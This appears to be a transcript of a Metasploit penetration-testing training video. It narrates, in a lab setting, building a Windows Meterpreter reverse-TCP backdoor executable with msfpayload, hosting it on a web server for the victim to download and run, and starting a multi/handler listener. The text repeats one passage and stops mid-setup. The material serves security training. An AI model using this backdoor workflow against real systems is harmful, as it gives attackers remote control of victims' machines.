Hello, welcome to Insectex, Information Security Technologies training on penetration testing with Metasploit. In the last video, we have gone through the basic introduction to the Meterpreter and how Meterpreter is going to work. In this video, we will perform basic post exploitation over the Meterpreter. So we will be covering these following commands, which contains core command usage, file system commands, networking commands, system commands, user interface command, and privilege commands. So coming to the scenario, first of all, we will be launching the attack. Right? So for this, in the stage 1, we will be creating a customized executable backdoor using the MSF payload, and we will be deploying this particular backdoor in our web server, that is in the var www, and we shall start the Apache service. And on the other hand, what the victim need to do is he need to just download the file and he need to open up the file. And as an attacker, what he need to do is he need to accept the connection, right? For this, he will be using the multi-handler exploit, and he will be assigning the same settings, that is the payload settings, alhost settings, and the lport settings, which he has been used for creating the. So this is a scenario. Attacker is trying to compromise this particular XP box. So if the payload and exploit gets executed successfully, and the machine will be in the attacker control. So now let us discuss the core commands, and even before that, let us start exploiting the machine. So the first step here is we need to create a customized backdoor. We shall do it by using the MSF payload. Windows gets executed successfully, and the machine will be in the attacker control. So now let us discuss the core commands, and even before that, let us start exploiting the machine. So the first step here is we need to create a customized backdoor. We shall do it by using the MSF payload. Windows Meterpreter /TCP lhost equal to the attacker's IP 192.168.159.134, and lport equal to we shall keep it as 443. Lport equal to 443, and we are going to save this particular executable into our web server. Let it be 123.exe. And finally, this malicious file has been created. So this is the p that executable for the Windows. And now we shall start our web server. Okay. Now let us open up the XP box. Open the Internet Explorer. .exe. Okay, let's save this file over the desktop. Click on save. Close this. Okay, before executing it, we shall try to enable the listener. Okay. So we need to use multi-handler exploit. Use exploit multi-handler, and whatever the settings which you have supplied here. Okay, so we have used the /TCP payload, right? So we need to use this particular payload over here. Okay, set payload, Windows, Meterpreter,